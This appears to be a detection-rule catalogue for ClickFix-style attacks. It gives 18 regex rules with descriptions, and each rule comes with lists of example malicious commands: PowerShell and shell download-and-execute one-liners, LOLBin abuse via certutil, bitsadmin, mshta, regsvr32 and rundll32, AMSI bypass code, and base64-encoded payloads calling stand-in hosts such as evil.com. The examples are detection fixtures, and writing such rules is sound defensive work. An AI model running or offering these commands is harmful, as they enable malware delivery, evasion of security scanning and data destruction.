[01] Base64 Powershell
Detects PowerShell executing base64-encoded commands. Strong indicator of ClickFix attacks hiding malicious payloads.
(?i)(powershell.*-\s*(?:e|enc|encodedcommand)(?:\^?[a-z])*?\s+[A-Za-z0-9+/]{20,}={0,2})
โถ
View malicious examples
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQB2AGkAbAAuAGMAbwBtAC8AcAAuAHAAcwAxACIAKQA=
powershell.exe -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEUA
powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA==
POWERSHELL -ENC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
PowerShell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACIASABlAGwAbABvACIA
powershell -encoded cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwAgAA==
powershell -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIA
powershell.exe -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==
powershell -encodedcommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAG0AYQBsAHcAYQByAGUALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkA
powershell.exe -nop -ep bypass -enc cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAGMAYQBsAGMA
cmd /c powershell -e VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAaQBjAGkAbwB1AHMAIQ==
powershell -ep bypass -w hidden -encodedcommand ZQB4AGUAYwAoACIAbQBhAGwAaQBjAGkAbwB1AHMAIABJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIgApAA==
powershell -E^N^C SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
powershell.exe -e^n^c^o^d^e^d^c^o^m^m^a^n^d JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=
cmd /c powershell -e^nc VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAaQBjAGkAbwB1AHMAIQ==
[02] Iex Download First
Detects PowerShell downloading and executing remote scripts with IEX. Hallmark of fileless malware attacks.
(?i)((iwr|invoke-webrequest|wget|curl|webclient.*downloadstring).*\|.*(iex|invoke-expression))
โถ
View malicious examples
IWR http://evil.com/payload.ps1 | IEX
Invoke-WebRequest https://malware.com/script.ps1 | Invoke-Expression
curl http://attacker.com/malicious.ps1 | IEX
wget https://evil.com/backdoor.ps1 | Invoke-Expression
IWR http://bad.com/p.ps1 -UseBasicParsing | IEX
powershell -c "IWR http://evil.com/s.ps1 | IEX"
curl https://attacker.com/payload.ps1 -UseBasicParsing | Invoke-Expression
iwr http://evil.com/clickfix.ps1|iex
powershell -command "iwr update.coinmarketsap.com | iex"
iwr evil.com/payload.ps1 | iex
Invoke-WebRequest malware-site.net/script.ps1 | IEX
Invoke-WebRequest -Uri http://malware.com/stage2.ps1 -UseBasicParsing|IEX
(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1') | IEX
IWR 'http://evil.com/payload.ps1' -UseBasicParsing|iex
Invoke-WebRequest -Uri "https://evil.com/stager.ps1" | Invoke-Expression
curl http://malware.com/reverse-shell.ps1 -UseBasicParsing|IEX
[03] Download Iex Pipe
Detects WebClient.DownloadString piped to IEX. Classic ClickFix pattern for in-memory script execution.
(?i)((iex|invoke-expression).*webclient.*download(string|file).*https?://|webclient.*download(string|file).*https?://.*(iex|invoke-expression|\|))
โถ
View malicious examples
(New-Object Net.WebClient).DownloadString("http://evil.com/p.ps1") | IEX
(New-Object Net.WebClient).DownloadString('https://malware.com/script.ps1') | Invoke-Expression
powershell -c "(New-Object Net.WebClient).DownloadString('http://attacker.com/mal.ps1') | IEX"
(New-Object Net.WebClient).DownloadString("https://bad.com/payload.ps1")|IEX
IEX (New-Object Net.WebClient).DownloadString("http://evil.com/dropper.ps1")
powershell (New-Object Net.WebClient).DownloadString("http://attacker.com/p.ps1")|IEX
IEX(New-Object Net.WebClient).DownloadString('http://evil.com/clickfix.ps1')
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://malware.com/implant.ps1')
(New-Object System.Net.WebClient).DownloadString('http://attacker.com/stager.ps1')|IEX
IEX ((New-Object Net.WebClient).DownloadString('https://bad.com/loader.ps1'))
powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/backdoor.ps1')"
iex (New-Object Net.WebClient).DownloadString('http://attacker.com/obfuscated.ps1')
[04] Mshta
Detects mshta.exe executing remote HTA files or inline scripts. Commonly abused to bypass application whitelisting.
(?i)(mshta(\.exe)?\s+(https?://|ftp://|javascript:|vbscript:|about:|data:))
โถ
View malicious examples
mshta http://evil.com/payload.hta
mshta http://81.0x5a.29.64/ebc/rps.gz
mshta javascript:alert('XSS');close();
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe"")")
mshta about:<html><script>alert('xss')</script></html>
mshta.exe https://malware.com/dropper.hta
MSHTA http://attacker.com/backdoor.hta
mshta.exe javascript:eval('malicious code here')
mshta vbscript:CreateObject("WScript.Shell").Run("powershell -enc payload")
mshta http://evil.com/clickfix.hta
mshta https://malware.com/stage2.hta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('cmd /c evil'))
mshta about:blank
mshta.exe ftp://evil.com/malicious.hta
mshta data:text/html,<script>alert('XSS')</script>
cmd /c mshta javascript:a=GetObject('script:https://attacker.com/payload.sct').Exec()
[05] Certutil
Detects certutil downloading files from URLs. Extremely common in ClickFix attacks (50-55% prevalence). Legitimate certificate tool frequently abused for malware delivery.
(?i)(certutil.*-url(cache)?.*(http|ftp)s?://)
โถ
View malicious examples
certutil -urlcache -f http://evil.com/malware.exe C:\malware.exe
certutil.exe -urlcache -split -f https://attacker.com/payload.dll payload.dll
certutil -url http://malware.com/backdoor.exe backdoor.exe
CERTUTIL -URLCACHE -F http://evil.com/dropper.exe dropper.exe
certutil.exe -urlcache https://bad.com/trojan.dll C:\Windows\Temp\trojan.dll
certutil -urlcache -split -f ftp://evil.com/malware.exe mal.exe
certutil -f -split -urlcache http://attacker.com/evil.dll
certutil.exe -urlcache -f "http://evil.com/clickfix.exe" clickfix.exe
certutil -urlcache http://malware.com/payload.exe C:\Temp\payload.exe
certutil.exe -url -f https://evil.com/backdoor.dll backdoor.dll
certutil -urlcache -f http://192.168.1.100/malware.bin malware.bin
cmd /c certutil -urlcache -f http://evil.com/stage2.dll stage2.dll
certutil.exe -f -urlcache https://evil.com/implant.exe implant.exe
certutil -url https://malware.com/loader.dll -f loader.dll
[06] Bitsadmin
Detects bitsadmin downloading files from URLs. Common in ClickFix attacks (35-45% prevalence). Windows background transfer utility abused for payload downloads.
(?i)(bitsadmin.*/(transfer|download|addfile).*(https?|ftp)://)
โถ
View malicious examples
bitsadmin /transfer job http://evil.com/malware.exe C:\malware.exe
bitsadmin.exe /transfer download https://attacker.com/payload.dll payload.dll
BITSADMIN /TRANSFER myJob /DOWNLOAD /PRIORITY HIGH http://evil.com/backdoor.exe backdoor.exe
bitsadmin /transfer dl http://malware.com/trojan.exe C:\Temp\trojan.exe
bitsadmin.exe /transfer downloadJob ftp://evil.com/dropper.exe dropper.exe
bitsadmin /transfer job1 http://bad.com/evil.dll C:\Windows\Temp\evil.dll
bitsadmin.exe /transfer "My Job" https://attacker.com/clickfix.exe clickfix.exe
bitsadmin /transfer test http://evil.com/payload.exe C:\Users\Public\payload.exe
bitsadmin.exe /transfer jobName /download /priority foreground http://malware.com/mal.exe mal.exe
bitsadmin /transfer download http://evil.com/backdoor.dll backdoor.dll
bitsadmin.exe /transfer ransomware https://attacker.com/encrypt.exe C:\Temp\encrypt.exe
bitsadmin /transfer implant /priority normal http://evil.com/implant.dll implant.dll
cmd /c bitsadmin /transfer mal http://192.168.1.100/malware.bin C:\malware.bin
bitsadmin.exe /transfer "Update Job" ftp://malware.com/update.exe C:\Users\victim\update.exe
bitsadmin /transfer stage2 https://evil.com/stage2.ps1 C:\Windows\Temp\stage2.ps1
bitsadmin.exe /transfer /download /priority high http://attacker.com/loader.exe loader.exe
bitsadmin /transfer clickfix http://evil.com/clickfix-installer.msi C:\Temp\installer.msi
bitsadmin.exe /transfer backdoor /priority foreground https://malware.com/backdoor.exe backdoor.exe
bitsadmin /transfer "System Update" http://evil.com/fake-update.exe C:\ProgramData\update.exe
bitsadmin.exe /addfile myJob http://evil.com/malware.dll C:\malware.dll
[07] Amsi Bypass
Detects AMSI bypass attempts. Critical indicator of evasion techniques.
(?i)((amsiutils|amsiinitfailed|amsicontext).*(setvalue|bypass|nonpublic|=\s*\$true)|ref.*assembly.*gettype.*amsi)
โถ
View malicious examples
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
$amsi = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext')
powershell -c "$x=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$x.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$a.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null,$null)
[System.Management.Automation.AmsiUtils].GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiContext','NonPublic,Static').SetValue($null,[IntPtr]::Zero)
[08] Powershell Flags
Detects PowerShell with suspicious flag combinations like hidden windows and bypassed execution policy.
(?i)(powershell.*-w(indowstyle)?\s+h(idden)?|-w(indowstyle)?\s+h(idden)?.*-e(p|xecutionpolicy)?\s+(bypass|unrestricted)|-e(p|xecutionpolicy)?\s+(bypass|unrestricted).*-w(indowstyle)?\s+h(idden)?)
โถ
View malicious examples
powershell -w hidden -c "malicious code"
powershell.exe -WindowStyle Hidden -Command "IWR http://evil.com/p.ps1 | IEX"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File malicious.ps1
powershell -ep bypass -w hidden -c "evil command"
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "backdoor"
powershell -w h -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/p.ps1')"
POWERSHELL -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY BYPASS malware.ps1
powershell -ep unrestricted -w hidden malicious.ps1
powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden script.ps1
powershell -nop -w h -ep bypass -c "evil"
powershell.exe -WindowStyle h -ExecutionPolicy bypass -Command "malware"
powershell -w hidden -nop -ep bypass -c "(New-Object Net.WebClient).DownloadString('http://evil.com/s.ps1')|IEX"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "backdoor"
powershell -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass clickfix.ps1
powershell.exe -NoProfile -w hidden -ep bypass -c "curl http://evil.com/p.ps1 | iex"
cmd /c powershell -w hidden -nop -ep bypass -c "malicious"
powershell -WindowStyle Hidden -NoProfile -ep bypass -c "IWR http://attacker.com/payload.ps1|IEX"
[09] Regsvr32
Detects regsvr32 executing remote scriptlets or DLLs. Application whitelisting bypass technique. Detects various flag combinations, URL protocols (HTTP/HTTPS/FTP), and .sct file extensions.
(?i)(regsvr32.*(https?://|ftp://.*\.sct|scrobj\.dll.*https?://|\.sct))
โถ
View malicious examples
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
regsvr32.exe /u /i:https://attacker.com/malicious.sct scrobj.dll
REGSVR32 /I:http://malware.com/backdoor.sct SCROBJ.DLL
regsvr32 /s /i:"http://evil.com/dropper.sct" scrobj.dll
regsvr32.exe /u /n /i:ftp://evil.com/payload.sct scrobj.dll
regsvr32 /i:http://bad.com/clickfix.sct scrobj.dll
regsvr32.exe /s /i:https://192.168.1.100/malware.sct scrobj.dll
regsvr32 /u /i:http://attacker.com/stage2.sct scrobj.dll
cmd /c regsvr32 /s /n /u /i:http://evil.com/implant.sct scrobj.dll
regsvr32.exe /i:https://malware.com/ransomware.sct scrobj.dll
regsvr32 /s /u /i:ftp://evil.com/trojan.sct scrobj.dll
regsvr32.exe /i:"http://evil.com/clickfix-installer.sct" scrobj.dll
regsvr32 /s /n /i:https://attacker.com/loader.sct scrobj.dll
regsvr32.exe C:\Temp\malicious.sct
regsvr32 /u /i:http://evil.com/backdoor.sct scrobj.dll
regsvr32.exe /s /i:https://malware.com/obfuscated.sct scrobj.dll
regsvr32 C:\Users\Public\Downloads\dropper.sct
regsvr32.exe /u /n /i:http://192.168.1.50:8080/payload.sct scrobj.dll
regsvr32 /i:https://evil.com/reverse-shell.sct scrobj.dll
regsvr32.exe /s C:\Windows\Temp\evil.sct
[10] Osascript
Detects osascript executing remote scripts or inline AppleScript. macOS-specific attack vector.
(?i)(osascript.*do\s+shell\s+script.*(curl|wget|bash|sh|python|ruby|perl|rm|chmod|sudo|launchctl))
โถ
View malicious examples
osascript -e 'do shell script "curl http://evil.com/malware.sh | bash"'
osascript -e 'do shell script "wget http://attacker.com/backdoor.sh -O /tmp/b.sh && bash /tmp/b.sh"'
osascript -e 'do shell script "python -c 'import urllib; exec(urllib.urlopen(''http://evil.com/p.py'').read())'"'
osascript -e 'do shell script "curl -s http://malware.com/dropper.sh | sh"'
osascript -e 'do shell script "ruby -e 'require ''net/http''; eval(Net::HTTP.get(URI(''http://evil.com/s.rb'')))'"'
osascript -e 'do shell script "bash <(curl -s http://attacker.com/payload.sh)"'
osascript -e 'do shell script "wget -qO- http://evil.com/clickfix.sh | bash"'
osascript -e 'do shell script "curl http://malware.com/implant.py | python"'
osascript -e 'do shell script "sh -c '$(curl -fsSL http://evil.com/stage2.sh)'"'
osascript -e 'do shell script "perl -e 'use LWP::Simple; eval(get(''http://attacker.com/p.pl''))'"'
osascript -e 'do shell script "curl http://evil.com/ransomware.sh | sudo bash"'
osascript -e 'do shell script "wget http://malware.com/backdoor.rb -O /tmp/b.rb && ruby /tmp/b.rb"'
osascript -e 'do shell script "bash -c 'curl http://evil.com/trojan.sh | bash'"'
osascript -e 'do shell script "python3 -c 'import urllib.request; exec(urllib.request.urlopen(''http://evil.com/mal.py'').read())'"'
osascript -e 'do shell script "curl -L http://attacker.com/loader.sh | sh"'
osascript -e 'do shell script "rm -rf /important/data && curl http://evil.com/notify"'
osascript -e 'do shell script "chmod +x /tmp/malware && /tmp/malware"'
osascript -e 'do shell script "curl http://evil.com/cron.sh | bash && launchctl load /tmp/persistence.plist"'
osascript -e 'do shell script "wget -O /tmp/dropper http://malware.com/dropper && chmod 755 /tmp/dropper && /tmp/dropper"'
osascript -e 'do shell script "bash <(wget -qO- http://evil.com/obfuscated.sh)"'
osascript -e 'do shell script "curl -s http://attacker.com/reverse.sh | sh -s"'
osascript -e 'do shell script "python -m http.server 8080 & curl http://evil.com/exfil.sh | bash"'
osascript -e 'do shell script "sudo curl http://malware.com/rootkit.sh | bash"'
osascript -e 'do shell script "perl -MLWP::Simple -e 'eval(get(''http://evil.com/payload.pl''))'"'
osascript -e 'do shell script "curl http://192.168.1.100/malware.sh | bash"'
[11] Bash Pipe Shell
Detects bash commands piped to shell interpreters. Requires context to distinguish from legitimate admin tasks.
(?i)(^(?![\s]*#)(curl|wget).*(https?|ftp)://.*\|.*(bash|sh|zsh))
โถ
View malicious examples
curl http://evil.com/malware.sh | bash
wget -qO- http://attacker.com/payload.sh | sh
curl -s https://malware.com/exploit.sh | bash
wget -O - http://evil.com/dropper.sh | zsh
curl http://bad.com/backdoor.sh | sh
wget -qO- http://192.168.1.100/clickfix.sh | bash
curl -fsSL http://evil.com/installer.sh | sudo bash
wget --quiet -O - http://attacker.com/ransomware.sh | sh
curl -s http://malware.com/reverse-shell.sh | bash -
wget -qO- ftp://evil.com/exploit.sh | zsh
curl -L http://evil.com/stage2.sh | bash
wget -O- http://attacker.com/implant.sh | sh
curl --silent http://evil.com/loader.sh | sudo sh
wget -q -O - http://malware.com/backdoor.sh | bash
curl -sSL http://evil.com/dropper.sh | ksh
wget -qO- http://attacker.com/trojan.sh | bash -x
curl http://evil.com/persistence.sh | sh -s
wget --no-check-certificate https://malware.com/payload.sh -O - | bash
curl -fsSL http://evil.com/obfuscated.sh | bash -c 'cat | bash'
wget -qO- http://192.168.1.50:8080/malware.sh | zsh
[12] Base64 Shell Decode
Detects base64 encoded commands decoded and executed in shell. Common in Linux/macOS ClickFix attacks.
(?i)(echo.*\|.*base64.*(--decode|-d)|base64.*(--decode|-d).*\|.*(bash|sh|zsh|eval))
โถ
View malicious examples
bash -c "echo SGFja2Vk | base64 -d | bash"
sh -c "echo $(echo ZXZpbF9jb21tYW5k | base64 -d)"
sh -c "echo SGFja2VyX2NvbW1hbmQ= | base64 --decode | sh"
bash -c "echo Y3VybCBodHRwOi8vZXZpbC5jb20vcGF5bG9hZC5zaA== | base64 -d"
sh -c "echo cHdkOyBjdXJsIGh0dHA6Ly9ldmlsLmNvbS9wYXlsb2FkLnNo | base64 -d"
bash -c "echo d2dldCBodHRwOi8vZXZpbC5jb20vbWFsd2FyZS5zaA== | base64 --decode | bash"
sh -c "echo Y3VybCAtcyBodHRwOi8vYXR0YWNrZXIuY29tL2Ryb3BwZXIuc2g= | base64 -d | sh"
bash -c "echo bmMgLWUgL2Jpbi9iYXNoIGV2aWwuY29tIDQ0NDQ= | base64 -d"
sh -c "echo cHl0aG9uIC1jICdleGVjKC4uLik=' | base64 --decode"
bash -c "echo $(echo bWFsaWNpb3VzX2NvbW1hbmQ= | base64 -d)"
echo Y3VybCBodHRwOi8vZXZpbC5jb20vc2NyaXB0LnNofGJhc2g= | base64 -d | bash
echo d2dldCAtcU8tIGh0dHA6Ly9ldmlsLmNvbS9wYXlsb2FkLnNofHNo | base64 --decode | sh
echo SGFja2VyIHBheWxvYWQ= | base64 -d | eval
eval "$(echo ZXZpbCBjb21tYW5k | base64 -d)"
(echo bWFsaWNpb3VzX2NvbW1hbmQ= | base64 -d) | bash
echo Y3VybCBodHRwOi8vYXR0YWNrZXIuY29tL21hbHdhcmUuc2ggfCBiYXNo | base64 --decode | bash
echo $(echo ZG93bmxvYWQgYW5kIGV4ZWN1dGU= | base64 -d | sh)
bash -c "echo cHl0aG9uIC1jIGltcG9ydCB1cmxsaWI= | base64 -d"
zsh -c "echo Y3VybCBodHRwOi8vbWFsd2FyZS5jb20= | base64 -d | zsh"
echo SGFja2VkIQ== | base64 --decode | bash
[13] Shell Substitution Download
Detects shell command substitution, backticks, and process substitution downloading remote scripts.
(?i)((\$\(|`|<\()(curl|wget).*(https?|ftp)://)
โถ
View malicious examples
$(curl http://evil.com/malware.sh | bash)
echo $(wget -qO- http://attacker.com/payload.sh) | sh
$(curl -s https://malware.com/backdoor.sh | sh)
bash -c "$(wget -O - http://evil.com/dropper.sh)"
$(curl http://bad.com/script.sh)
sh -c "$(wget -qO- https://evil.com/exploit.sh)"
$(curl -fsSL http://attacker.com/install.sh | bash)
eval $(wget -qO- ftp://evil.com/payload.sh)
payload=$(curl http://attacker.com/malware.sh); eval $payload
$(curl -H 'User-Agent: Mozilla' http://evil.com/obfuscated.sh | sh)
$(curl -L http://evil.com/stage2.sh) | bash
$(wget -qO- https://evil.com/ransomware.sh) | sudo bash
eval "$(curl -s http://malware.com/loader.sh)"
cmd=$(curl http://evil.com/command.sh); sh -c "$cmd"
$(curl -k https://attacker.com/payload.sh | bash -s)
$(curl ftp://attacker.com/dropper.sh) > /tmp/d.sh && bash /tmp/d.sh
`curl http://evil.com/script.sh | bash`
`wget -qO- http://attacker.com/malware.sh | sh`
eval `curl -s https://evil.com/payload.sh`
`wget -O - http://malware.com/dropper.sh`
sh -c "`curl http://evil.com/backdoor.sh`"
bash <(curl http://evil.com/script.sh)
sh <(wget -qO- https://attacker.com/payload.sh)
bash <(curl -s http://malware.com/installer.sh)
eval "bash <(curl http://evil.com/exploit.sh)"
sudo bash <(wget -qO- ftp://evil.com/dropper.sh)
bash <(curl -fsSL http://attacker.com/malware.sh)
[14] Filefix Powershell Path
Detects PowerShell scripts in suspicious temp locations. Common malware staging area.
(?i)(powershell.*([Tt]emp|AppData|Users.{0,2}Public|ProgramData|/tmp|/var/tmp).*\.ps1)
โถ
View malicious examples
powershell -File C:\Windows\Temp\malicious.ps1
powershell -ExecutionPolicy Bypass C:\Temp\backdoor.ps1
powershell.exe C:\Users\Public\Downloads\evil.ps1
powershell -File "C:\Users\victim\AppData\Local\Temp\dropper.ps1"
powershell /tmp/malware.ps1
powershell -File /var/tmp/exploit.ps1
powershell.exe -ExecutionPolicy Bypass C:\Temp\clickfix.ps1
powershell -File "C:\Windows\Temp\payload.ps1"
powershell C:\Users\user\AppData\Local\Temp\attack.ps1
powershell -Command C:\Users\Public\malware.ps1
powershell.exe C:\Users\victim\AppData\Roaming\backdoor.ps1
powershell -nop -ep bypass -File C:\ProgramData\trojan.ps1
powershell.exe -File C:\Users\Public\Documents\dropper.ps1
powershell C:\Temp\evil.ps1
powershell . C:\Windows\Temp\stager.ps1
powershell /tmp/clickfix-installer.ps1
cmd /c powershell -File C:\Temp\malware.ps1
[15] Rundll32
Detects rundll32 executing DLLs downloaded from remote URLs. Living-off-the-land technique for stealthy execution.
(?i)(rundll32.*(javascript:|vbscript:|about:|(https?|ftp)://|(temp|appdata|public|programdata|/tmp).*\.dll.*(execute|entrypoint|run|start|main|dllmain|dllregisterserver|loader|init|launch)))
โถ
View malicious examples
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();eval("malicious")
rundll32 C:\Temp\evil.dll,EntryPoint
rundll32.exe C:\Users\victim\AppData\Local\Temp\malware.dll,Start
rundll32 http://evil.com/payload.dll
rundll32.exe C:\Windows\Temp\backdoor.dll,Run
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";new ActiveXObject("WScript.Shell").Run("cmd /c malicious")
rundll32 C:\Users\Public\Downloads\trojan.dll,Execute
rundll32.exe C:\ProgramData\malware.dll,DllMain
rundll32 vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe"")")(window.close)
rundll32.exe C:\Temp\clickfix.dll,Loader
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";document.write("<script>eval(atob(\"base64payload\"))</script>")
rundll32.exe C:\Users\victim\AppData\Roaming\implant.dll,Init
rundll32 C:\Windows\Temp\ransomware.dll,Launch
rundll32.exe about:blank javascript:eval("malicious code")
rundll32 /tmp/malware.dll,Execute
rundll32.exe C:\Users\Public\dropper.dll,EntryPoint
cmd /c rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.resizeTo(0,0);eval("evil")
rundll32 C:\ProgramData\backdoor.dll,Run
rundll32.exe https://attacker.com/payload.dll
rundll32 C:\Users\victim\AppData\Local\Temp\stage2.dll,Start
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.body.innerHTML="<script src=http://evil.com/mal.js></script>"
rundll32 C:\Temp\persistence.dll,DllRegisterServer
rundll32.exe ftp://evil.com/malicious.dll
rundll32 C:\Windows\Temp\obfuscated.dll,Main
rundll32.exe C:\Users\Public\Documents\trojan.dll,Execute
[16] Installutil
Detects installutil executing untrusted assemblies. .NET tool abused for code execution bypass. Focuses on assemblies loaded from suspicious temp locations with common evasion flags.
(?i)(installutil.*(temp|appdata|public|programdata).*\.(exe|dll))
โถ
View malicious examples
InstallUtil.exe C:\Temp\malware.exe
installutil.exe /U C:\Windows\Temp\backdoor.dll
InstallUtil C:\Users\victim\AppData\Local\Temp\evil.exe
installutil.exe /logfile= /LogToConsole=false C:\Temp\trojan.exe
InstallUtil.exe /U C:\Users\Public\clickfix.exe
installutil C:\ProgramData\implant.dll
InstallUtil.exe /uninstall C:\Windows\Temp\ransomware.exe
installutil.exe /LogToConsole=false C:\Temp\dropper.dll
InstallUtil /U /logfile= C:\Users\victim\AppData\Local\Temp\stage2.exe
installutil.exe C:\Users\Public\Documents\malicious.exe
InstallUtil.exe /logtoconsole=false C:\Windows\Temp\loader.dll
installutil /U C:\ProgramData\backdoor.exe
InstallUtil.exe C:\Users\guest\AppData\Local\Temp\trojan.dll
installutil.exe /logfile= C:\Temp\persistence.exe
InstallUtil /uninstall /LogToConsole=false C:\Windows\Temp\obfuscated.dll
installutil.exe C:\Users\Public\Downloads\malware.exe
InstallUtil.exe /U /logtoconsole=false C:\ProgramData\evil.dll
cmd /c installutil.exe C:\Temp\clickfix-installer.exe
InstallUtil C:\Users\victim\AppData\Roaming\implant.exe
installutil.exe /logfile= /U C:\Windows\Temp\stager.dll
[17] Command Chain
Detects download commands chained with execution. Multi-stage attack pattern for automated payload delivery.
(?i)((certutil|bitsadmin|curl|wget|powershell|iwr).*(https?|ftp)://.*(\&\&|\|\||;|\|).*(cmd|powershell|bash|sh|rundll32|regsvr32|mshta|wscript|cscript|\.exe|\.bat|\.vbs))
โถ
View malicious examples
certutil -urlcache -f http://evil.com/malware.exe C:\malware.exe && C:\malware.exe
powershell -c "IWR http://evil.com/p.ps1 -OutFile p.ps1" && powershell -ExecutionPolicy Bypass p.ps1
curl http://malware.com/bad.dll -o bad.dll && rundll32 bad.dll,EntryPoint
bitsadmin /transfer job http://evil.com/trojan.exe trojan.exe && cmd /c trojan.exe
wget http://evil.com/payload.sh -O payload.sh && bash payload.sh
certutil -urlcache http://evil.com/evil.dll evil.dll && regsvr32 evil.dll
powershell IWR http://evil.com/script.ps1 -OutFile s.ps1 && powershell s.ps1
wget http://evil.com/dropper.hta -O d.hta && mshta d.hta
curl http://attacker.com/backdoor.exe -o C:\Temp\backdoor.exe && C:\Temp\backdoor.exe
certutil -urlcache -f http://evil.com/payload.exe payload.exe && start payload.exe
powershell IWR http://malware.com/mal.ps1 -OutFile mal.ps1 && powershell -nop -ep bypass mal.ps1
wget http://evil.com/exploit.sh && sh exploit.sh
curl http://attacker.com/trojan.dll -o trojan.dll && regsvr32 /s trojan.dll
bitsadmin /transfer job http://evil.com/clickfix.exe clickfix.exe && clickfix.exe
certutil -urlcache -f http://evil.com/malware.vbs malware.vbs && wscript malware.vbs
powershell IWR http://evil.com/backdoor.exe -OutFile backdoor.exe && .\backdoor.exe
curl http://evil.com/payload.sh | bash
certutil -urlcache -f http://attacker.com/mal.exe mal.exe; mal.exe
wget http://evil.com/reverse.sh -O /tmp/r.sh && chmod +x /tmp/r.sh && /tmp/r.sh
curl -o C:\Temp\evil.exe http://malware.com/evil.exe && C:\Temp\evil.exe
[18] Start Bitstransfer
Detects Start-BitsTransfer downloading files from URLs. PowerShell cmdlet abused for malware downloads.
(?i)(start-bitstransfer.*(https?|ftp)://)
โถ
View malicious examples
Start-BitsTransfer -Source http://evil.com/malware.exe -Destination C:\malware.exe
Start-BitsTransfer -Source "https://attacker.com/payload.dll" -Destination payload.dll
powershell -c "Start-BitsTransfer -Source http://malware.com/backdoor.exe -Destination backdoor.exe"
Start-BitsTransfer -Source ftp://evil.com/trojan.exe -Destination C:\Temp\trojan.exe
Start-BitsTransfer http://bad.com/dropper.dll C:\dropper.dll
Start-BitsTransfer -Source https://192.168.1.100/clickfix.exe -Destination C:\Windows\Temp\clickfix.exe
Start-BitsTransfer -Source 'http://evil.com/ransomware.exe' -Destination 'C:\Users\Public\ransomware.exe'
powershell Start-BitsTransfer -Source http://malware.com/implant.ps1 -Destination implant.ps1
Start-BitsTransfer -Source https://attacker.com/stage2.dll -Destination C:\Temp\stage2.dll -Priority Foreground
Start-BitsTransfer -Source ftp://evil.com/backdoor.exe -Destination backdoor.exe
powershell -nop -ep bypass -c "Start-BitsTransfer -Source http://evil.com/loader.exe -Destination loader.exe"
Start-BitsTransfer -Source http://malware.com/reverse-shell.ps1 -Destination C:\ProgramData\rs.ps1
Start-BitsTransfer -Source https://evil.com/trojan.dll -Destination C:\Windows\Temp\trojan.dll
Start-BitsTransfer http://attacker.com/clickfix-installer.msi C:\Temp\installer.msi
powershell.exe -Command "Start-BitsTransfer -Source 'https://evil.com/malware.exe' -Destination 'malware.exe'"
Start-BitsTransfer -Source http://evil.com/dropper.vbs -Destination C:\Users\victim\AppData\Local\Temp\dropper.vbs
Start-BitsTransfer -Source ftp://192.168.1.50/payload.bin -Destination payload.bin
Start-BitsTransfer -Source https://malware.com/obfuscated.ps1 -Destination obfuscated.ps1 -Description 'Update'
Start-BitsTransfer -Source http://evil.com/persistence.exe -Destination C:\ProgramData\persistence.exe
powershell Start-BitsTransfer -Source 'http://attacker.com/exploit.dll' -Destination 'exploit.dll'
